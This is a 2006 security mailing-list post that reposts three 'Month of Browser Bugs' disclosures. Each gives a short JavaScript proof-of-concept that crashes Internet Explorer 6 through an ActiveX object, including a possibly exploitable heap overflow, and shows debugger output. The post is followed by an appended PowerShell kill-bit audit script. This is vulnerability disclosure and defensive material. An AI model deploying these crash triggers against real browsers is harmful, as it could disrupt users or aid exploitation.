funsec mailing list archives

Re: H D Moore opened Browser Fun Blog


From: "Dude VanWinkle" <dudevanwinkle () gmail com>
Date: Mon, 3 Jul 2006 16:04:14 -0400

Here are the first three FYI:

MoBB #1: ADODB.Recordset Filter Property

The following bug was tested on the latest version of Internet
Explorer 6 on a fully-patched Windows XP SP2 system. The interesting
thing about this bug is how the same property has to be set three
different times to trigger the exception.

a = new ActiveXObject('ADODB.Recordset');
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = 0x7ffffffe; } catch(e) { }

Demonstration

eax=001dbfdc ebx=02820e18 ecx=02821288
edx=028212a8 esi=02821288 edi=00000000
eip=4de194f7 esp=0013ade8 ebp=0013adf0
msado15!CSysString::operator=+0x12:
4de194f7 3907 cmp [edi],eax ds:0023:00000000=????????

This bug was reported to Microsoft on March 6th, 2006.
This bug has been added to the OSVDB:
Microsoft IE ADODB.Recordset COM Object Filter Property NULL Dereference.

posted by hdm @ 11:27 PM
MoBB #2: Internet.HHCtrl Image Property

The following bug was tested on the latest version of Internet
Explorer 6 on a fully-patched Windows XP SP2 system. This bug is
interesting because a small heap overflow occurs each time this
property is set. The bug is difficult to detect unless heap
verification has been enabled in the global debug flags for
iexplore.exe. The demonstration below results in a possibly
exploitable heap corruption after 128 or more iterations of the
property set.

var a = new ActiveXObject("Internet.HHCtrl.1");
var b = unescape("XXXX");
while (b.length < 256) b += b;

for (var i=0; i<4096; i++) {
a['Image'] = b + "";
}

Demonstration

eax=00030288 ebx=00030000 ecx=7ffdd000
edx=00030608 esi=58585850 edi=00000022
eip=7c911f52 esp=0013afcc ebp=0013b1ec
ntdll!RtlAllocateHeap+0x31b:
7c911f52 8a4605 mov al,[esi+0x5] ds:0023:58585855=??

This bug was reported to Microsoft on March 6th, 2006.
This bug has been added to the OSVDB:
Microsoft IE HTML Help COM Object Image Property Heap Overflow.

posted by hdm @ 9:11 AM


MoBB #3: OutlookExpress.AddressBook

The following bug was tested on the latest version of Internet
Explorer 6 on a fully-patched Windows 2000 SP4 system. It appears to
have been resolved (via killbit) in a recent update to Windows XP SP2.
This bug is one of many that are triggered by loading a non-ActiveX
COM object from inside Internet Explorer.

a = new ActiveXControl('OutlookExpress.AddressBook');

Demonstration

eax=00000000 ebx=06622008 ecx=00000002
edx=065814e4 esi=00000000 edi=00000000
eip=0648b2f5 esp=0012a734 ebp=0012a754
msoe!IDwGetOption+0x78:
0648b2f5 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug was reported to Microsoft on March 6th, 2006.
This bug has been added to the OSVDB:
Microsoft IE OutlookExpress.AddressBook COM Object NULL Dereference.
_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.
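As an added defensive check (not part of the original post or of hdm's blog): the snippet below resolves the three ProgIDs quoted above to their CLSIDs and reports whether Internet Explorer's kill bit (the 0x400 bit of "Compatibility Flags" under the ActiveX Compatibility key) is set for each, which is the mitigation the third entry mentions. The registry paths are the standard IE locations; the function name is ours.

```powershell
# Added example: audit IE kill-bit status for the COM ProgIDs named in the MoBB entries.
$progIds = @('ADODB.Recordset', 'Internet.HHCtrl.1', 'OutlookExpress.AddressBook')

function Get-KillBitStatus {
    param([Parameter(Mandatory)][string]$ProgId)

    # Resolve ProgID -> CLSID via HKEY_CLASSES_ROOT\<ProgID>\CLSID (default value).
    $clsidKey = "Registry::HKEY_CLASSES_ROOT\$ProgId\CLSID"
    if (-not (Test-Path $clsidKey)) {
        # ProgID not registered on this machine, so it cannot be instantiated at all.
        return [pscustomobject]@{ ProgId = $ProgId; Clsid = $null; Registered = $false; KillBit = $null }
    }
    $clsid = (Get-ItemProperty -Path $clsidKey).'(default)'

    # The kill bit is bit 0x400 of "Compatibility Flags" under this per-CLSID key.
    $compatKey = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
    $flags = 0
    if (Test-Path $compatKey) {
        $value = Get-ItemProperty -Path $compatKey -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
        if ($value) { $flags = [int]$value.'Compatibility Flags' }
    }

    [pscustomobject]@{
        ProgId     = $ProgId
        Clsid      = $clsid
        Registered = $true
        KillBit    = (($flags -band 0x400) -ne 0)   # $true means IE refuses to load it
    }
}

$progIds | ForEach-Object { Get-KillBitStatus -ProgId $_ } | Format-Table -AutoSize
```

On 64-bit Windows, 32-bit Internet Explorer reads the same key under HKLM\SOFTWARE\Wow6432Node\..., so audit that path as well.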
